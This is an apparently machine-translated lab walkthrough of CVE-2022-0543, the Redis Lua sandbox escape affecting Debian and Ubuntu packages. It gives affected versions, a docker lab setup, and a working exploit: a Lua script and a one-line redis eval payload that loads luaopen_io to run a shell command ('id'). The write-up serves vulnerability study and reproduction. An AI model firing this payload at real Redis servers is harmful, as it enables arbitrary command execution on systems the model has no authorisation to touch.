Redis Lua sandbox bypass command execution (cve-2022-0543)

Introduction to vulnerability principle

Redis It's open source （BSD The license ） Memory data structure storage , Use as database 、 Caching and message broker .

Redis Is the famous open source Key-Value database , It has the ability to execute... In a sandbox Lua Scripting capabilities .

stay Ubuntu Distribution packaging , Inadvertently Lua Redistribute a box object in the sandbox package, The attack exploits this object's load dynamic library , have access to package.loadlib from liblua Load module , Then use this module to execute arbitrary commands ;

Reference link ：

• An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
• #1005787 - redis: CVE-2022-0543 - Debian Bug report logs

Vulnerability version

2.2 <= redis < 5.0.13

2.2 <= redis < 6.0.15

2.2 <= redis < 6.2.5

Vulnerability environment

Execute the following command to start a Ubuntu Source installed Redis 5.0.7 The server

docker-compose  up -d

After the service starts , We can use redis-cli -h your-ip Connect this redis The server .

Loophole recurrence

We use Lua Variables left in the sandbox `package` Of `loadlib` Function to load the dynamic link library `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0` Export function in `luaopen_io`. stay Lua Execute this export function in , You can get `io` library , Then use it to execute the command ：

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

  Be careful ,liblua library , Different systems liblua The path may be different ,vulhub Corresponding ubantu The path of the system

utilize payload

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

Command executed successfully